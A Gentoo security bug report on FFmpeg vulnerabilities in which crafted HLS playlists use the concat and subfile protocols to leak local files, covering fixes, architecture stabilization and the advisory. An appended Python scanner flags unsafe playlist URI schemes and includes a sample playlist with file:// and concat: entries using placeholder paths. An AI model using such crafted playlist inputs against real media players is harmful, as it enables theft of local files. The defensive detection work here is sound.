Summary: | <media-video/ffmpeg-2.8.5: stealing local files with HLS+concat (CVE-2016-{1897,1898,2326,2327}) | ||
---|---|---|---|
Product: | Gentoo Security | Reporter: | Agostino Sarubbo <ago> |
Component: | Vulnerabilities | Assignee: | Gentoo Security <security> |
Status: | RESOLVED FIXED | ||
Severity: | minor | CC: | alexander, barzog, ivnaidenov, limanski, linear-techs, media-video, pacho, ykonotopov |
Priority: | Normal | ||
Version: | unspecified | ||
Hardware: | All | ||
OS: | Linux | ||
URL: | http://www.openwall.com/lists/oss-security/2016/01/13/3 | ||
Whiteboard: | A4 [glsa] | ||
Package list: | Runtime testing required: | --- | |
Bug Depends on: | 565684, 570878 | ||
Bug Blocks: | | ||
Description
Agostino Sarubbo
Archlinux rebuilt ffmpeg only with --disable-demuxer='hls' --disable-protocol='concat,hls' to work around this bug, without disabling network capabilities in general. Was that the upstream fix or is this unrelated?
http://git.videolan.org/?p=ffmpeg.git;a=blobdiff;f=libavformat/concatdec.c;h=d226e1504ed90d344deb48fbbc79e18ad89c92eb;hp=d21805fe71b02ae62aaf9ec2d340458d0a116b8a;hb=fdb2d4b1084c92aa9bb1d2f948abdb86a361f219;hpb=a43deea8614a901aae85d175b6580183aede20f9
http://git.videolan.org/?p=ffmpeg.git;a=commit;h=fdb2d4b1084c92aa9bb1d2f948abdb86a361f219

*** Bug 572050 has been marked as a duplicate of this bug. ***

from: http://ffmpeg.org/security.html

2.8.5 Fixes following vulnerabilities:
CVE-2016-1897,CVE-2016-1898, 23b903aaf4eefb1ce1396a32525c8e5501d5cec8 / 6ba42b6482c725a59eb468391544dc0c75b8c6f0
CVE-2016-1897,CVE-2016-1898, b7d54d6e072690a62d5ea5ade66ffce6944a5ff4 / 7145e80b4f78cff5ed5fee04d4c4d53daaa0e077
CVE-2016-1897,CVE-2016-1898, 28f89bc439be1de9a61ac404ce79f9bc4cac5ec8 / cfda1bea4c18ec1edbc11ecc465f788b02851488

so, 2.8.5 should fix it.

stabilization process was started in bug #565684, but you can cc arches here if you prefer

According to this http://ffmpeg.org/index.html#news, 2.7.5, 2.6.7 and 2.5.10 also contain fixes for these vulnerabilities. So 2.6.7 can go stable (since 2.6 is the current stable branch in Gentoo).

*** Bug 572244 has been marked as a duplicate of this bug. ***

I've checked ffmpeg-2.6.7 emerged successfully with a renamed ffmpeg-2.6.4.ebuild.

well, since sec team seems busy, CCing arches here

@arch teams: target is =media-video/ffmpeg-2.8.5
you'll likely need x265 (bug #570878)

amd64 stable

x86 stable

Stable for HPPA PPC64.

Stable on alpha, took app-arch/snappy along.

*** Bug 565684 has been marked as a duplicate of this bug. ***

arm stable

CVE-2016-2327 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2327): libavcodec/pngenc.c in FFmpeg before 2.8.5 uses incorrect line sizes in certain row calculations, which allows remote attackers to cause a denial of service (out-of-bounds array access) or possibly have unspecified other impact via a crafted .avi file, related to the apng_encode_frame and encode_apng functions.

CVE-2016-2326 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2326): Integer overflow in the asf_write_packet function in libavformat/asfenc.c in FFmpeg before 2.8.5 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted PTS (aka presentation timestamp) value in a .mov file.

CVE-2016-1898 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1898): FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read arbitrary files by using the subfile protocol in an HTTP Live Streaming (HLS) M3U8 file, leading to an external HTTP request in which the URL string contains an arbitrary line of a local file.

CVE-2016-1897 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1897): FFmpeg 2.x allows remote attackers to conduct cross-origin attacks and read arbitrary files by using the concat protocol in an HTTP Live Streaming (HLS) M3U8 file, leading to an external HTTP request in which the URL string contains the first line of a local file.

ppc stable

sparc stable

ia64 stable.

Maintainer(s), please cleanup.
Security, please vote.

Added to existing GLSA.

This issue was resolved and addressed in GLSA 201606-09 at https://security.gentoo.org/glsa/201606-09 by GLSA coordinator Kristian Fiskerstrand (K_F).
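Added here as a defensive check, not code from this bug report, FFmpeg or Gentoo: a small Python scanner that reports every URI in an M3U8 playlist whose scheme is neither http(s) nor relative, which is how the concat/subfile references described in CVE-2016-1897/1898 show up in a playlist received from the network. The scheme sets, the sample playlist and its placeholder paths are all constructed for this example.

```python
import re

# Allowlist: a playlist fetched from the network should reference only http(s)
# or relative URIs. Schemes that make the demuxer open local resources (the
# CVE-2016-1897/1898 vector) are named explicitly; this set is an assumption.
LOCAL_SCHEMES = {"concat", "subfile", "file"}
REMOTE_SCHEMES = {"http", "https"}
_SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")
_ATTR_URI_RE = re.compile(r'URI="([^"]*)"')

def classify_uri(uri: str) -> str:
    """Return 'relative', 'remote', 'unsafe' or 'unknown' for one URI."""
    m = _SCHEME_RE.match(uri.strip())
    if not m:
        return "relative"  # resolved against the playlist's own URL
    scheme = m.group(1).lower()
    if scheme in REMOTE_SCHEMES:
        return "remote"
    if scheme in LOCAL_SCHEMES:
        return "unsafe"
    return "unknown"

def scan_playlist(text: str) -> list[tuple[int, str, str]]:
    """List (line_no, uri, verdict) for every URI that is not http(s) or relative."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        # Bare lines are segment/sub-playlist URIs; tags such as EXT-X-KEY and
        # EXT-X-MAP carry theirs in a URI="..." attribute. Empty lines classify
        # as 'relative' and are therefore never reported.
        uris = _ATTR_URI_RE.findall(line) if line.startswith("#") else [line]
        for uri in uris:
            verdict = classify_uri(uri)
            if verdict in ("unsafe", "unknown"):
                findings.append((line_no, uri, verdict))
    return findings

# Constructed sample: an ordinary segment, a key URI pointing at a local file
# and a concat: segment. The paths are placeholders, not real payloads.
SAMPLE = """#EXTM3U
#EXT-X-KEY:METHOD=AES-128,URI="file:///placeholder/key.bin"
#EXTINF:10.0,
https://cdn.example/seg0.ts
#EXTINF:10.0,
concat:placeholder-local.ts|https://cdn.example/seg1.ts
#EXT-X-ENDLIST
"""

if __name__ == "__main__":
    for line_no, uri, verdict in scan_playlist(SAMPLE):
        print(f"line {line_no}: {verdict}: {uri}")
```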